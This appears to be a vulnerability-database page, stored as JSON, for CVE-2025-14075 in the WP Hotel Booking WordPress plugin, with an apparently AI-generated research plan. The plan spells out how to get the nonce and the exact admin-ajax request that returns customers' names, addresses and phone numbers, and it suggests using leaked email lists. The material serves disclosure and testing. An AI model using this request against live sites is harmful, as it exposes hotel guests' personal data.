[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fwwo9S4JxpzdMqXgcYBzhYp7nNH60NnNe1gDv27Jzd14":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":9,"research_vulnerable_code":9,"research_fix_diff":9,"research_exploit_outline":9,"research_model_used":34,"research_started_at":35,"research_completed_at":36,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":37},"CVE-2025-14075","wp-hotel-booking-unauthenticated-sensitive-information-exposure-via-email-parameter","WP Hotel Booking \u003C= 2.2.7 - Unauthenticated Sensitive Information Exposure via 'email' Parameter","The WP Hotel Booking plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.2.7. This is due to the plugin exposing the 'hotel_booking_fetch_customer_info' AJAX action to unauthenticated users without proper capability checks, relying only on a nonce for protection. This makes it possible for unauthenticated attackers to retrieve sensitive customer information including full names, addresses, phone numbers, and email addresses by providing a valid email address and a publicly accessible nonce.","wp-hotel-booking",null,"\u003C=2.2.7","2.2.8","medium",5.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:L\u002FI:N\u002FA:N","Exposure of Sensitive Information to an Unauthorized Actor","2026-01-16 14:00:37","2026-01-17 02:22:30",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F1fc4eaec-b5d8-4707-9260-bac02a4b1866?source=api-prod",1,[22,23,24,25,26,27,28,29],"assets\u002Fdist\u002Fjs\u002Ffrontend\u002Fhotel-booking.asset.php","assets\u002Fdist\u002Fjs\u002Ffrontend\u002Fhotel-booking.js","assets\u002Fdist\u002Fjs\u002Ffrontend\u002Fhotel-booking.js.map","assets\u002Fdist\u002Fjs\u002Ffrontend\u002Fhotel-booking.min.asset.php","assets\u002Fdist\u002Fjs\u002Ffrontend\u002Fhotel-booking.min.js","assets\u002Fjs\u002Ffrontend\u002Fhotel-booking.js","includes\u002FTemplateHooks\u002FArchiveRoomTemplate.php","includes\u002Fclass-wphb-ajax.php","researched",false,3,"# Research Plan: CVE-2025-14075 - WP Hotel Booking Sensitive Information Exposure\n\n## 1. Vulnerability Summary\nThe **WP Hotel Booking** plugin (\u003C= 2.2.7) contains a sensitive information exposure vulnerability in its AJAX handling logic. The plugin registers the `hotel_booking_fetch_customer_info` action for both authenticated and unauthenticated users. This function retrieves and returns all post meta associated with a booking (`hb_booking` post type) matching a provided email address. Because the function relies solely on a publicly accessible nonce and lacks any capability or identity checks, an unauthenticated attacker can retrieve full names, addresses, phone numbers, and other sensitive details of any customer by knowing their email address.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `hotel_booking_fetch_customer_info`\n- **HTTP Method**: `POST`\n- **Parameters**:\n    - `action`: `hotel_booking_fetch_customer_info`\n    - `email`: The target customer's email address (e.g., `victim@example.com`).\n    - `nonce`: A valid WordPress nonce for the action `hb_booking_nonce_action`.\n- **Authentication**: Unauthenticated (`nopriv`).\n- **Preconditions**: An existing booking must exist in the database for the targeted email address.\n\n## 3. Code Flow\n1. **Entry Point**: `includes\u002Fclass-wphb-ajax.php` registers the action:\n   ```php\n   \u002F\u002F line 47\n   'fetch_customer_info' => true,\n   \u002F\u002F lines 73-77\n   add_action( \"wp_ajax_hotel_booking_{$action}\", array( __CLASS__, $action ) );\n   if ( $priv ) {\n       add_action( \"wp_ajax_nopriv_hotel_booking_{$action}\", array( __CLASS__, $action ) );\n   }\n   ```\n2. **Nonce Verification**: `WPHB_Ajax::fetch_customer_info()` verifies the nonce:\n   ```php\n   \u002F\u002F line 215\n   if ( empty( hb_get_request( 'nonce', false ) )\n       || ! wp_verify_nonce( hb_get_request( 'nonce' ), 'hb_booking_nonce_action' ) ) {\n       die();\n   }\n   ```\n3. **Data Retrieval**: The function searches for `hb_booking` posts where the meta key `_hb_customer_email` matches the provided `$email`:\n   ```php\n   \u002F\u002F lines 220-225\n   $args  = array(\n       'post_type'   => 'hb_booking',\n       'meta_key'    => '_hb_customer_email',\n       'meta_value'  => $email,\n       'post_status' => 'any',\n   );\n   ```\n4. **Information Exposure**: If a booking is found, it extracts *all* post meta for that booking and includes it in the JSON response:\n   ```php\n   \u002F\u002F lines 231-235\n   if ( $posts = get_posts( $args ) ) {\n       $customer       = $posts[0];\n       $customer->data = array();\n       $data           = get_post_meta( $customer->ID );\n       foreach ( $data as $k => $v ) {\n           $customer->data[ $k ] = $v[0];\n       }\n   }\n   ```\n   This includes sensitive keys such as `_hb_customer_first_name`, `_hb_customer_last_name`, `_hb_customer_address`, `_hb_customer_phone`, etc.\n\n## 4. Nonce Acquisition Strategy\nThe nonce is required to pass the `wp_verify_nonce` check. The plugin localizes this nonce into the `hotel_settings` JavaScript object.\n\n1. **Identify Trigger**: The scripts are typically enqueued on pages containing the checkout or search functionality.\n2. **Create Page**: Create a page containing the `[hb_checkout]` shortcode.\n   - Command: `wp post create --post_type=page --post_status=publish --post_title=\"Checkout\" --post_content=\"[hb_checkout]\"`\n3. **Navigate & Extract**:\n   - Use `browser_navigate` to go to the newly created Checkout page.\n   - Use `browser_eval` to extract the nonce from the localized object.\n   - **JS Object**: `hotel_settings`\n   - **Nonce Key**: `nonce`\n   - **Command**: `browser_eval(\"window.hotel_settings?.nonce\")`\n\n## 5. Exploitation Strategy\n1. **Obtain Nonce**: Follow the strategy in Section 4.\n2. **Send Exploit Request**: Use the `http_request` tool to send a POST request to `admin-ajax.php`.\n   - **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n   - **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n   - **Body**: `action=hotel_booking_fetch_customer_info&email=victim@example.com&nonce=[EXTRACTED_NONCE]`\n3. **Analyze Response**: The response should be a JSON object containing the `ID` of the booking and a `data` object with all the victim's personal information.\n\n## 6. Test Data Setup\n1. **Create Victim Booking**:\n   - Create a post of type `hb_booking`.\n   - Command: `wp post create --post_type=hb_booking --post_status=publish --post_title=\"Booking for Victim\"` (Note the ID).\n2. **Add Sensitive Meta**:\n   - `_hb_customer_email`: `victim@example.com`\n   - `_hb_customer_first_name`: `John`\n   - `_hb_customer_last_name`: `Doe`\n   - `_hb_customer_address`: `123 Secret Lane, Privacy City`\n   - `_hb_customer_phone`: `555-0199`\n   - Commands:\n     - `wp post meta set [BOOKING_ID] _hb_customer_email victim@example.com`\n     - `wp post meta set [BOOKING_ID] _hb_customer_first_name John`\n     - `wp post meta set [BOOKING_ID] _hb_customer_last_name Doe`\n     - `wp post meta set [BOOKING_ID] _hb_customer_address \"123 Secret Lane, Privacy City\"`\n     - `wp post meta set [BOOKING_ID] _hb_customer_phone 555-0199`\n3. **Create Nonce Page**:\n   - Create a page with the `[hb_checkout]` shortcode as described in Section 4.\n\n## 7. Expected Results\n- The AJAX request should return an HTTP 200 OK.\n- The response body should be a JSON object resembling:\n  ```json\n  {\n    \"ID\": 123,\n    \"post_author\": \"1\",\n    \"post_date\": \"...\",\n    \"data\": {\n      \"_hb_customer_email\": \"victim@example.com\",\n      \"_hb_customer_first_name\": \"John\",\n      \"_hb_customer_last_name\": \"Doe\",\n      \"_hb_customer_address\": \"123 Secret Lane, Privacy City\",\n      \"_hb_customer_phone\": \"555-0199\",\n      \"...\": \"...\"\n    }\n  }\n  ```\n\n## 8. Verification Steps\n1. **Verify Response**: Ensure the fields in the JSON response match the meta data set during the \"Test Data Setup\" phase.\n2. **Database Check**: Run `wp post meta list [BOOKING_ID]` to confirm the data being returned is exactly what is stored in the database.\n\n## 9. Alternative Approaches\n- **Different Shortcode**: If `[hb_checkout]` doesn't load the script, try `[hb_archive_room]` or `[hb_search_results]`.\n- **Global Search**: If the email address is unknown, an attacker might guess common emails or use information from other leaked databases to perform targeted lookups.\n- **Nonce Source**: Check the \"Archive Room\" page if the checkout page is restricted; `ArchiveRoomTemplate.php` calls `check_room_availability`, which likely triggers frontend JS initialization.","gemini-3-flash-preview","2026-05-05 07:30:36","2026-05-05 07:30:55",{"type":38,"vulnerable_version":39,"fixed_version":11,"vulnerable_browse":40,"vulnerable_zip":41,"fixed_browse":42,"fixed_zip":43,"all_tags":44},"plugin","2.2.7","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-hotel-booking\u002Ftags\u002F2.2.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-hotel-booking.2.2.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-hotel-booking\u002Ftags\u002F2.2.8","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwp-hotel-booking.2.2.8.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwp-hotel-booking\u002Ftags"]